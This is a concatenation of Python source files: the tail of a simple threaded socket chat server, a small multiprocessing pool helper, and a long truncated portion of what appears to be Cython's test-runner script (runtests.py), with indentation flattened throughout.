DISCONNECT_MESSAGE='!DISCONECT'
CLIENT_LIST=set()
server=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
server.bind(ADRESS_DEF)
def message_reciv_send(cilentSocket,clientAddress):
while True:
message=cilentSocket.recv(1024).decode(FORMAT)
if message:
if message==DISCONNECT_MESSAGE:
print('{} has left the channel'.format(clientAddress))
CLIENT_LIST.remove(cilentSocket)
for cl in CLIENT_LIST:
#if cl is not cilentSocket:
cl.send((clientAddress[0] + ":" + str(clientAddress[1]) +" says: "+ message).encode("utf-8"))
def get_start():
server.listen(2)
while True:
print(' A new User has attented, waits for the client')
cilentSocket,clientAddress= server.accept()
#if cilentSocket not in CLIENT_LIST:
CLIENT_LIST.add(cilentSocket)
t1= threading.Thread(target= message_reciv_send, args=(cilentSocket,clientAddress))
t1.start()
get_start()
|
mypool.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, Pipe, cpu_count
class MyPool:
proc_num = cpu_count()
def __init__(self, proc_num):
self.proc_num = proc_num
def map(self, func, args):
def pipefunc(conn, arg):
conn.send(func(arg))
conn.close()
ret = []
k = 0
while (k < len(args)):
plist = []
clist = []
end = min(k + self.proc_num, len(args))
for arg in args[k:end]:
pconn, cconn = Pipe()
plist.append(Process(target=pipefunc, args=(cconn, arg,)))
clist.append(pconn)
for p in plist:
p.start()
for conn in clist:
ret.append(conn.recv())
for p in plist:
p.join()
k += self.proc_num
return ret
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
from collections import defaultdict
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro and getattr(numpy, '__version__', '') not in ('1.19.0', '1.19.1'):
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_gdb_extension(ext, _has_gdb=[None]):
# We should probably also check for Python support.
if not include_debugger:
_has_gdb[0] = False
if _has_gdb[0] is None:
try:
subprocess.check_call(["gdb", "--version"])
except (IOError, subprocess.CalledProcessError):
_has_gdb[0] = False
else:
_has_gdb[0] = True
if not _has_gdb[0]:
return EXCLUDE_EXT
return ext
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
from distutils import ccompiler
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:gdb': update_gdb_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
'tag:py3only': exclude_extension_in_pyver((2, 7)),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
'run.time_pxd', # _PyTime_GetSystemClock doesn't exist in 3.4
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x)) # needs lambda to set function attribute
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.doctest_selector = re.compile(options.only_pattern).search if options.only_pattern else None
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
# TODO: parallelise I/O with a thread pool for the different directories once we drop Py2 support
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if (sys.platform not in ['win32'] and self.add_embedded_test
# the embedding test is currently broken in Py3.8+, except on Linux.
and (sys.version_info < (3, 8) or sys.platform != 'darwin')):
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if 'c' in languages and skip_c(tags):
languages = list(languages)
languages.remove('c')
if 'cpp' in languages and 'no-cpp' in tags['tag']:
languages = list(languages)
languages.remove('cpp')
if not languages:
return []
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
doctest_selector=self.doctest_selector,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False, doctest_selector=None,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.doctest_selector = doctest_selector
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
if IS_PY2:
